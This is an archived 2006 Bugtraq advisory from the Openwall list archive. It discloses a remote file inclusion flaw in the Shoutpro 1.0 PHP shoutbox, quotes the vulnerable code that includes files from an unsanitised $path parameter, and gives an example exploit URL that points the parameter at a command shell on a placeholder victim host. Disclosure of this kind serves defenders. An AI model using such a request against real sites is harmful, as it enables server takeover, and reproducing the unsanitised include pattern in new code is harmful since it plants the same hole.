lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 13 Jun 2006 17:39:42 -0000
From: SpC-x@...mail.Org
To: bugtraq@...urityfocus.com
Subject: Shoutpro 1.0 Version - Remote File Include Vulnerability


# SaVSaK.CoM | SpC-x - The_BeKiR |

# Shoutpro 1.0 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : Shoutpro

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include("config.php");
# include("functions.php");
# if ($path){
#	$ips = file("$path/lists/bannedips.php");
# } else {
#	$ips = file("lists/bannedips.php");
# }
# if (in_array($REMOTE_ADDR,$ips)) {   
#	echo($bannedmessage);
#	die;
# }

# Vulnerable :

# http://www.victim.com/Shoutpro/include.php?path=Command-Shell


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ